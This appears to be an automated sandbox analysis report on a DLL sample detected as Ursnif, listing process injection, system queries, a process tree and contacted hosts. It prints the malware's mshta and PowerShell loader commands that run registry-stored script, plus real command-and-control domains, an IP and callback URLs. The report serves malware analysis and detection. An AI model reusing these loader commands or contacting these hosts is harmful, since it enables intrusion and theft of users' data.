Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04853E8D ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 0_2_04853E8D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053D3E8D ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 3_2_053D3E8D

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: gtr.antoinfer.com
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 185.228.233.17 80 Jump to behavior
Allocates memory in foreign processes
Source: C:\Windows\System32\loaddll32.exe Memory allocated: C:\Windows\System32\control.exe base: FA0000 protect: page execute and read and write Jump to behavior
Compiles code for process injection (via .Net compiler)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Local\Temp\y3j0hr41\y3j0hr41.0.cs Jump to dropped file
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: 736E1580 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: 736E1580
Source: C:\Windows\System32\control.exe Thread created: unknown EIP: 736E1580
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3388 base: 10B8000 value: 00 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Windows\System32\loaddll32.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\System32\loaddll32.exe Thread register set: target process: 4924 Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF71E6A12E0 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: FA0000 Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF71E6A12E0 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF71E6A12E0 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF71E6A12E0 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 10B8000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\beneficial.dll',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kdz1kgtq\kdz1kgtq.cmdline' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\tangn2aw\tangn2aw.cmdline' Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES7CE2.tmp' 'c:\Users\user\AppData\Local\Temp\kdz1kgtq\CSC3C6C006953954AC2BBB3EA5383F4311.TMP'
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\4mppu3lx\4mppu3lx.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\y3j0hr41\y3j0hr41.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES92FA.tmp' 'c:\Users\user\AppData\Local\Temp\tangn2aw\CSCCFAE70CB50C649DC9230F2DAC50A036.TMP'
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB25A.tmp' 'c:\Users\user\AppData\Local\Temp\4mppu3lx\CSC5D5E602DFAC54795936F9835A1D78A6E.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESCF86.tmp' 'c:\Users\user\AppData\Local\Temp\y3j0hr41\CSC1BD10A2A5D864F59B6883896D7374BCD.TMP'
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Bn9l='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Bn9l).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>J7aj='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(J7aj).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: loaddll32.exe, 00000000.00000002.476069829.0000000001940000.00000002.00000001.sdmp, powershell.exe, 00000015.00000002.506371635.0000024483D40000.00000002.00000001.sdmp, powershell.exe, 0000001A.00000002.522399282.000001DB074B0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: loaddll32.exe, 00000000.00000002.476069829.0000000001940000.00000002.00000001.sdmp, powershell.exe, 00000015.00000002.506371635.0000024483D40000.00000002.00000001.sdmp, powershell.exe, 0000001A.00000002.522399282.000001DB074B0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.476069829.0000000001940000.00000002.00000001.sdmp, powershell.exe, 00000015.00000002.506371635.0000024483D40000.00000002.00000001.sdmp, powershell.exe, 0000001A.00000002.522399282.000001DB074B0000.00000002.00000001.sdmp Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.476069829.0000000001940000.00000002.00000001.sdmp, powershell.exe, 00000015.00000002.506371635.0000024483D40000.00000002.00000001.sdmp, powershell.exe, 0000001A.00000002.522399282.000001DB074B0000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0485FF06 cpuid 0_2_0485FF06
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA, 0_2_6E231813
Queries the installation date of Windows
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0484C420 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError, 0_2_0484C420
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E231983 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 0_2_6E231983
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04854D10 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 0_2_04854D10
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E231262 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 0_2_6E231262
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000003.00000003.348342609.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.373389445.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370586120.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.435306000.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370648596.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.454676310.0000018F0052C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000002.524027105.0000018F0052C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.348321035.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370736273.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.454577691.0000018F0052C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370774075.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.348246192.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.354947926.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370705290.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.357289358.0000000004E8C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.379171921.0000000003CBC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.409791915.0000000005858000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.348360798.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.348388126.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.352157676.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.377531681.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.348375110.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.348299510.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370678028.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.454500473.0000018F0052C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.348273789.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.454723611.0000018F0052C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370795651.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370752260.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 4156, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5928, type: MEMORYSTR

Remote Access Functionality:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000003.00000003.348342609.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.373389445.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370586120.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.435306000.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370648596.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.454676310.0000018F0052C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000002.524027105.0000018F0052C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.348321035.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370736273.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.454577691.0000018F0052C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370774075.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.348246192.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.354947926.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370705290.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.357289358.0000000004E8C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.379171921.0000000003CBC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.409791915.0000000005858000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.348360798.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.348388126.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.352157676.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.377531681.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.348375110.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.348299510.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370678028.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.454500473.0000018F0052C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.348273789.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.454723611.0000018F0052C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370795651.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370752260.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 4156, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5928, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 456598 Sample: beneficial.dll Startdate: 30/07/2021 Architecture: WINDOWS Score: 100 79 app.flashgameo.at 2->79 81 resolver1.opendns.com 2->81 89 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->89 91 Multi AV Scanner detection for domain / URL 2->91 93 Found malware configuration 2->93 95 11 other signatures 2->95 10 loaddll32.exe 1 2->10         started        14 mshta.exe 19 2->14         started        16 mshta.exe 2->16         started        signatures3 process4 dnsIp5 83 gtr.antoinfer.com 10->83 109 Writes to foreign memory regions 10->109 111 Allocates memory in foreign processes 10->111 113 Modifies the context of a thread in another process (thread injection) 10->113 117 3 other signatures 10->117 18 cmd.exe 1 10->18         started        20 rundll32.exe 10->20         started        23 control.exe 10->23         started        30 2 other processes 10->30 115 Suspicious powershell command line found 14->115 25 powershell.exe 1 32 14->25         started        28 powershell.exe 16->28         started        signatures6 process7 file8 32 rundll32.exe 2 18->32         started        97 System process connects to network (likely due to code injection or exploit) 20->97 99 Writes registry values via WMI 20->99 71 C:\Users\user\AppData\...\kdz1kgtq.cmdline, UTF-8 25->71 dropped 101 Injects code into the Windows Explorer (explorer.exe) 25->101 103 Writes to foreign memory regions 25->103 105 Compiles code for process injection (via .Net compiler) 25->105 36 csc.exe 25->36         started        39 csc.exe 25->39         started        41 conhost.exe 25->41         started        43 explorer.exe 25->43 injected 73 C:\Users\user\AppData\Local\...\y3j0hr41.0.cs, UTF-8 28->73 dropped 107 Creates a thread in another existing process (thread injection) 28->107 45 csc.exe 28->45         started        47 csc.exe 28->47         started        49 conhost.exe 28->49         started        signatures9 process10 dnsIp11 75 app.flashgameo.at 185.228.233.17, 49725, 49726, 49727 ITOS-ASRU Russian Federation 32->75 77 gtr.antoinfer.com 32->77 85 System process connects to network (likely due to code injection or exploit) 32->85 87 Writes to foreign memory regions 32->87 51 control.exe 32->51         started        63 C:\Users\user\AppData\Local\...\kdz1kgtq.dll, PE32 36->63 dropped 53 cvtres.exe 36->53         started        65 C:\Users\user\AppData\Local\...\tangn2aw.dll, PE32 39->65 dropped 55 cvtres.exe 39->55         started        67 C:\Users\user\AppData\Local\...\4mppu3lx.dll, PE32 45->67 dropped 57 cvtres.exe 45->57         started        69 C:\Users\user\AppData\Local\...\y3j0hr41.dll, PE32 47->69 dropped 59 cvtres.exe 47->59         started        file12 signatures13 process14 process15 61 rundll32.exe 51->61         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.228.233.17
 gtr.antoinfer.com Russian Federation
64439 ITOS-ASRU true

Contacted Domains

Name IP Active
gtr.antoinfer.com 185.228.233.17 true
resolver1.opendns.com 208.67.222.222 true
app.flashgameo.at 185.228.233.17 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://gtr.antoinfer.com/5QxR3u9Oxc2/66JuutLFo4_2BN/FYPvHdZdpqBBUlII8YbkV/HeRpg9bicXJHtfwV/D4QIfvz6kYooZLO/cw4gCcjcoRxS01qkn1/EW0Ez7bVC/W7k8iaBQuoYhbKZqLnrE/RbmpYueuIODfoh6oP2l/c8Ac2bwpliTaTSR56vdGwk/ZRQxemEpvF2A8/99lPQg9V/lwEJF2LaR_2FZsZYxJbXRUs/6u5PpA2s_2/FPyKVp1yfx9FnP4nW/L_2Fr3MO_2By/WnKnaVSLrhm/N0Y4cK91iRGQ0B/oWkJGcqoY10Xhf8Gg076m/Kf5Jj7Gzg1x_2BtG/X7PsvIId3dQ8Qbd/BbiLQ_2F/U true
  • Avira URL Cloud: malware
 unknown
http://app.flashgameo.at/AaIOQUP2y/4dnIAMN75W41Bfts1fSz/M_2Fx5i8y8r51u0lG8k/Vow6wxsSIumTiRnzEaU_2F/CNqZZratbcUbt/LfJIE5RK/Qn2KT5OfSwybCTYBU60XzCf/sUfUuU3ny4/Nvm_2F3pWKviik2bT/GkHFCrtshckm/ulvNk97G1Hx/pXIQmYClmd4w2X/GUTmFeyxxN3C13bmMyAKU/NQgWhtBdSJ1Z_2Fo/_2B4Pdro50W_2FD/Bvoq_2B6Eukz15ckDu/b66LiH2F3/_2FbDHmG1_2BEazwEN73/RMWRczom09mYBn_2F5G/UMe8OA5em/vbxfmSXOeF5/N7V true
  • Avira URL Cloud: malware
 unknown